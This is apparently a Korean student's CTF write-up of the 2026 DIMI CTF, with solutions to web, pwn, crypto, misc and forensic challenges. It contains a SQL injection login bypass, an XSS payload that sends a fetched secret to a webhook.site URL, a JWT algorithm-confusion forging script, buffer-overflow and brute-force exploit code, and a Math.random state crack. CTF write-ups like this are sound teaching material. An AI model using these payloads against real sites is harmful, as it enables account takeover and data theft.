pandas의 기출 분석 - 2026 DIMI CTF

안녕하세요, pandas입니다.

2026. 03. 05 부터 10몇일간 진행된 dimi ctf에 참가해봤습니다

사실 신입생 대상인데 왜인지는 모르겠지만 2,3학년도 참여할 수 있다고해서 신나게 풀어봤습니다

 

전공 시간에 할 것도 없어서 그냥 출제자분들이나 참여자분들 보라고 롸업이나 적어보겠습니다

 

풀때는 걍 빨리 풀고 싶어서 모든 문제를 CODEX로 풀었고요, 괜찮은 문제들은 제가 직접 업솔빙해서 롸업 적어보겠습니다

 

MISC는 웬만하면 안 적을것 같고, PWN,REV,WEB 위주로 적어보겠습니다

쓰고 싶은것만 쓸겁니다. 거의 70문제가 넘은 거 같은디;;;;;

 

# WEB

WEB - 스텔스라서 보이지 않아요 - 1 

아니 갑자기 STEALTH 홈페이지가 나와서 놀랐다

STEALTH 홍보에 좋은 것 같다

주석에 있다

 

WEB - 스텔스라서 보이지 않아요 - 2

스텔스 시리즈였다

개발자도구 > Application > Cookie에 FLAG2가 존재한다

 

WEB - 스텔스라서 보이지 않아요 - 3

MoFW로 로그인하라고 한다

ID에 MoFW'-- 

비밀번호에 아무거나 넣으면 된다

SQL Injection이라는 공격이고, 내부 SQL 검사 로직에서 ID 입력에 MoFW' 를 넣으면, ID는 MoFW, --는 SQL에서 주석으로 처리된다

따라서 비밀번호 검사 로직이 주석화(==무력화)된다

 

WEB - 스텔스라서 보이지 않아요 - 4

로그인 하면

소스코드를 보면, 세션 스토리지에 flag4를 때려 넣는걸 볼 수 있습니다

친절하게 xss가 터진다고 알려주네요

  <img src="x" onerror="fetch('/member.flag').then(r=>r.text()).then(t=>{new Image().src='https://webhook.site/<YOUR_ID>?d='+encodeURIComponent(t)})">

 

WEB - John Wants TV

딱 봐도 JWT 알고리즘에서 이슈가 생길 것 같습니다

CSS따위는 없는 좋은 문제 페이지네요

한번씩 다 보면

/.well-known/jwks.json에서 수상한 친구가 있습니다

{
  "keys": [
    {
      "alg": "RS256",
      "e": "AQAB",
      "kid": "dock-main",
      "kty": "RSA",
      "n": "uL1jHclrqQu689DSXKiTyRp9rvcBoSeik6Cxa2yhcN6G1NvszzBcxKhZRTH4yXw5orkT0X-SGn_iMdMRwXcBRLSebe-8CNOQFq3lDgy0cQONJy579W3ufWiQQSJVo5AEjSv2ego4wABKumaAlAQIaIHUbPN-06plzx45i5suI96ZDuGQEpS_xeHwwAxOHipw-MFVfMVjELVQAvwBT8-EJfExOWRqB8866kdtM8C3vBYXujDFGQnDfE1uIwozInjJIilOq241ADASOf2B9nbCIc30auLp8XFWP-63cGv5s3tl5S344cL9MuICecHyOIHN_oWof5PJtWAETcY0iZnIYQ",
      "use": "sig"
    }
  ]
}

jwks_url = f"{base_url}/.well-known/jwks.json"
    jwks = requests.get(jwks_url, timeout=10).json()
    jwk = jwks["keys"][0]

    now = int(time.time())
    payload = {
        "sub": "operator",
        "role": "admin",
        "clearance": 7,
        "mission": "pegasus",
        "scope": ["dock:override"],
        "iss": "janus-auth",
        "iat": now,
        "exp": now + 900,
    }
    headers = {
        "kid": jwk["kid"],
        "typ": "access+jwt",
        "alg": "HS256",
    }

    return jwt.encode(payload, jwk["n"], algorithm="HS256", headers=headers)

jwt 다시 서명해서 전송하면 됩니다

 

 

# PWN

PWN - 이상한 프린터

C언어 코드 왜 안줌;;;

ida로 까기 귀찮아서 그냥 바로 실행해봤습니다

ls 치는거 바로 출력해주고, 느낌상 command injection 같아서 대충 찍어보니 되네요

찍신

 

v4 입력에 ;을 넣으면 echo 명령이 끝나게 되고, 그 뒤에 원하는 명령어를 입력하면 system 함수로 실행이 됩니다

작년에 제가 출제한 문제들 보다는 좀 어려운 거 같네요

 

PWN - 나눗셈

a에 -2147483648, b에 -1로 Overflow를 일으킵니다

 

PWN - Brain Overflow

누가봐도 win함수 호출하라는ww

gets func가 취약합니다

gets는 NULL까지 입력받습니다

대충 계산해봐도 payload len이 20이 넘을 것 같으니, NULL을 payload 맨 앞에 두고, payload 패딩을 보내면 됩니다

from pwn import *

p = process("./prob")
e = ELF("./prob")

payload = b"\x00" + b"A"*23 + p64(e.symbols['win'])
p.sendline(payload)

p.interactive()

뭐 remote도 될겁니다

인스턴스 받기 귀찮은건 안 비밀입니다

그냥 단순한 rao가 아니라, payload의 len 제한이 있는 부분이 까다로울 수 있다고 생각합니다

 

PWN - 카나리아 키우기

Canary 문제

또 없어 C코드,

win 함수는 줬고,

pie 없고 canary 있습니다

Canary Leak을 하는 것 보다는 걍 rip에만 쓸 수 있을 것 같습니다

 

%d로 입력을 받는데 canary 부분에 +를 넣으면 canary가 훼손되지 않습니다

코드 안짜도 될 거 같아서 그냥 win 함수 주소 변환 해서

땄습니다

 

STACK 구조에 대한 이해와 canary 우회 방법, 꽤나 까다로운 문제라고 생각합니다 (신입생 노베이스 기준)

문제 아이디어는 좋은 거 같네요

canary leak에서 rao하는 단순한 문제도 있었으면 좋았을 듯 하네요

 

PWN - Easy Login

감사하네요. IDA가 필요읎네요

코드를 보면 strcmp(user_id, "admin") == 0 이면 flag를 얻을 수 있습니다

OOB 취약점이 존재하고, ID를 ADMIN으로 바꾸면 됩니다

걍 코드로 짜서 푸는게 좋아서 이렇게 헀습니다

뭐 로되리안은 없겠죠,,

 

PWN - Flag Checker

read를 이용하여 풀었습니다

input 뒤에, flag가 있고, read로 200바이트를 읽습니다

input 뒤 flag까지 덮을 수 있고, input과 flag를 비교합니다

일치하면 Correct, 틀리면 wrong을 출력합니다

 

일단 쉘을 따는건 불가능해보입니다 (쉘 어케 따는 방법이 있나요...?)

하지만 flag를 알아내는 것은 가능할 것 같습니다

플래그는 printable ascii고, 마지막 바이트는 '\n' 입니다.

핵심입니다

 

input을 매번 다르게 하며, Correct를 출력하는 입력을 찾고, flag를 한 글자 한 글자 비교하면 됩니다

from pwn import *

charset = b"abcdefghijklmnopqrstuvwxyz" + b"0123456789" + b"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + b"!\"#$%&'()*+,-./:;<=>?@[]^_`{|}~ "

boundary = None
suffix = None

for s in [b"}\n", b"}"]:
    for i in range(100):
        test = b"A" * i + s + b"\x00"
        if len(test) > 100:
            break

        payload = test.ljust(100, b"B") + (b"A" * i)

        p = remote("39.118.211.92", 34272)
        p.send(payload)
        p.shutdown("send")
        if b"Correct!" in p.recvall(timeout=1):
            boundary = i
            suffix = s
            p.close()
            break
        p.close()

cur = suffix
while True:
    payload = (b"DIMI" + cur + b"\x00").ljust(100, b"B")

    p = remote("39.118.211.92", 34272)
    p.send(payload)
    p.shutdown("send")
    if b"Correct!" in p.recvall(timeout=1):
        p.close()
        print((b"DIMI" + cur).decode("ascii", "ignore"))
        break
    p.close()

    i = boundary + len(suffix) - len(cur) - 1
    for ch in charset:
        test = b"A" * i + bytes([ch]) + cur + b"\x00"
        if len(test) > 100:
            print("Too long")
            exit(0)

        payload = test.ljust(100, b"B") + (b"A" * i)

        p = remote("39.118.211.92", 34272)
        p.send(payload)
        p.shutdown("send")
        if b"Correct!" in p.recvall(timeout=1):
            p.close()
            cur = bytes([ch]) + cur
            break
        p.close()

브포를 때리다 보면 flag가 최종적으로 복구됩니다

굉장히 신박한 문제였고, 재미있었습니다

 

PWN - Infinity dance

쓰읍,,,,,풀어야겠지,,,ㅎㅎ

Last Dance의 revenge 문제라고 합니다

출제자분이 다른 곳에 문제를 낼 수도 있다고 하여, 풀이는 좀 검열하겠습니다

간단하게 설명하면 last dance(revenge 전 문제)는 8bytes aaw가 가능했고, ROP했습니다

 

여기서는 revenge 버전으로 ********가 가능합니다

*******도 걸려있습니다

 

일단 ** * ** *** *** **** **을 생각해봤습니다

(censored)

 

 

바이너리는 patchelf로 패치해줬고요

....

그렇게 하면 flag를 얻을 수 있습니다

 

 Py (base)  /mnt/c/KIM-JUN-WON/03_Programming/6_HACKING/CTF/2026_DIMICTF/infinity/deploy  p exploit.py  

.........

DIMI{redacted}
[*] Stopped process './prob_patched' (pid 2855944)
 Py (base)  /mnt/c/KIM-JUN-WON/03_Programming/6_HACKING/CTF/2026_DIMICTF/infinity/deploy 

익스 안정성은 좀 떨어지지만, 그래도 충분히 익스 가능합니다

MISC의 과도한 게싱 문제를 제외하고 DIMI CTF에서 가장 어려운 문제라고 생각합니다

AI만으로는 잘 안뚫려서 제가 분석하고, 익스 방향까지 지정해줬습니다

디버깅하면서 익스 코드는 AI가 짜줬네요,,,,,

재미있게 풀었습니다

 

# REV

죄송합니다,,,리버싱은 분석을 해야되잖아요,,,,

시간 이슈가 좀 있습니다,,,

원하는 문제 있다면 말씀해주시면 시간 날떄 분석하고, 적어보겠습니다

 

# CRYPTO

Crypto - Gacha

MoFW가 출제? 랜덤크랙이 무조건 있을 것 같았습니다

저 소수를 어떻게 찍어서 맞춥니까,,,,,

랜덤 크랙을 해보면 될 것 같습니다

 

Node.js로 만들어졌습니다

Predictability
: If an attacker can obtain a few consecutive outputs of 
Math.random()
, they can use specific tools and knowledge of the underlying algorithm (like XorShift128+ in V8/Node.js

이렇다네요

가능할 것 같습니다

 

맨 처음에 뜨는 github가 있습니다

다운받으면 됩니다

 

HIT를 보면 FLAG가 5글자이니 5개의 소수를 맞추면 될 것 같습니다

from crack import RandomSolver

leak = [
    0.6034371179275257,
    0.34153373054757186,
    0.6072523996128449,
    0.3832482909907422,
    0.6947977881469838
]

solver = RandomSolver()
for v in leak:
    solver.submit_random(v)
solver.solve()
for idx, gen in enumerate(solver.answers):
    if idx >= 1:
        break
    for _ in range(5):
        print(gen.random())

0을 입력해서 5개의 소수를 유출시켰고, exploit코드에 넣어서 실행했습니다

복구한 값을 차례대로 넣으면 random을 복구할 수 있습니다

node.js random crack은 처음인데 재미있게 풀었습니다

python random crack이였으면 못 풀었을 것 같은데 비교적 쉬웠던 것 같습니담

 

# MISC

MISC - Pixel Art

이게 전부입니다

 

정신나가는 줄 알았습니다

DIMI{omghow??nvm this is flag:DIMI{im4g3_c4n_als0_b3_pr0gr4mming_l4ngu4g3}}

 

이런걸 왜 알고 있는거죠,,,신박했네요

 

MISC - ひらがな

하,,,,

AI를 열심히 활용하는게 정말 중요한 것 같았습니다

딱봐도 풀지 말라고 낸 문제를 어떻게든지 풀어서 좋았네요

일단 이정도는 찾았습니다

이는 codex-5.4 extreme high와 chatgpt pro를 사용하여 이정도까지 얻어냈고, 힌트를 준다길래 지금까지의 분석을 질문했습니다

 

질문에 대한 답변은 "방향이 맞다. rc2 key 찾을 수 있다"였습니다

 

거의 다 온 것 같아서 더 gpt를 갈궜습니다

ChatGPT PRO - Extend Pro 모델을 사용했습니다

https://chatgpt.com/share/69afc309-c178-8009-a283-85a83350dd68

 

MISC - 행복한 수학

행siuuuuuuuuuuuuuu

pwntools를 사용해보기 좋은 연습 문제라고 생각합니다

from pwn import *

p = process("./prob")

p.recvline()
line = p.recvline()[:-5]
result = eval(line.decode().replace('/', '//'))
p.sendline(str(result).encode())

for i in range(499):
    p.recvline()
    p.recvline()
    line = p.recvline()[:-5]
    result = eval(line.decode().replace('/', '//'))
    print(i + 2)
    p.sendline(str(result).encode())

p.interactive()

remote는 기다리기 귀찮으니 local에서만 할게요

 

MISC - codex

게임이라고 거짓말이라고 해봤습니다

 

# FORENSIC 

FOR - onLeaf's USB

포렌식이고 뭐가 많습니다

1. MoFW
2. 현금_탈취
3. 2026-03-21
4. capital_bank
5. efsdecrypter

열심히 codex를 돌렸습니다

3번과 5번에서 좀 막혔는데,

3번은 Windows/time.tmp에서 한글로 날짜를 조합하면서 찾았고,

5번은 efsdecrypter.dll가 공격 소스인걸 보고 이걸로 찾았습니다

 

- Input string: MoFW_현금_탈취_2026-03-21_capital_bank_efsdecrypter
- MD5: 56db51f2d5a38578d71e77f640b28d2e
- Flag: DIMI{56db51f2d5a38578d71e77f640b28d2e}

 

MISC - RUBBER HOSE Lyla4

Lyla4를 찾아가야하는 문제입니다

신관에서 본관까지 가는게 너무너무 힘들어서 못풀었습니다 ㅜㅜ

엉엉 ㅜㅜ

 

# 후기

3학년이지만 왜인지 참가할 수 있다고 해서 참여해봤습니다

1학년에 신입생으로 참가해봤고,

2학년때는 ADMIN으로 다른 친구들이 낸 문제를 풀어봤고,

3학년때는 다시 노인으로 참여해봤습니다

 

3년째 참가해서, DIMI CTF의 망령이 되었네요

신입생때 60몇등 했는데 이제는 많이 많이 풀 수 있어서 좋네요

 

운영진들 모두 수고하셨고, 재미있었습니다

 

신입생때와 지금의 DIMI CTF를 비교해보면 AI가 정말 많이 발전해서, AI딸깍으로 문제가 많이 풀리는 것 같았습니다.

AI를 사용하면서 느낀 점들이 있고, 추후에 AI in CTF에 대한 글을 좀 작성해보려고 합니다

 

이상 고3 pandas였습니다.